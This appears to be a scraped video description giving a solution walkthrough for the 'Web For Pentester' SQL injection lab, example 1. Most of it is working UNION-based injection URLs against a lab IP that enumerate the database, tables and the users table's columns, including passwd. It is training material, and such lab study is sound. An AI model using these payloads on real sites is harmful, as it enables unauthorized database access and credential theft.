Web For Pentester Example 1 Sql Injection Solution
iSpeech.org
Web For Pentester Example 1 Sql Injection Solution
SQL Injection is a very commonly exploited web application vulnerability that allows malicious hackers to steal and alter data in a website's database.
Fix Query:
http://192.168.174.132/sqli/example1.php?name=root' and 1=1--+
find column :
http://192.168.174.132/sqli/example1.php?name=root' order by 5--+
Five columns Let's See Vulnerble columns :
http://192.168.174.132/sqli/example1.php?name=root' +UNION+ALL+SELECT+1,2,3,4,5--+
vulnerable column is 1,2,3 because they reflect back.
Database name :
http://192.168.174.132/sqli/example1.php?name=root' +UNION+ALL+SELECT+(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),2,3,4,5--+
Database name : exercises
find Tables : http://192.168.174.132/sqli/example1.php?name=root' +UNION+ALL+SELECT+(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x657865726369736573),2,3,4,5--+
Table Name : users
Let's Find Columns Of users : http://192.168.174.132/sqli/example1.php?name=root' +UNION+ALL+SELECT+(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x7573657273),2,3,4,5--+
columns Name :
id
name
age
groupid
passwd
Let's extract Data : Can't write because youtube don't allow brackets . watch the video carefully you will get from there.
that's all for this video and see you in next video. till then good Bye...
IF YOU LIKE THIS VIDEO. PLEASE DON'T FORGET TO LIKE SHARE AND SUBSCRIBE OUR CHANNEL.
THANKS FOR WATCHING.
2018-09-02 08:47:07
source
Gloss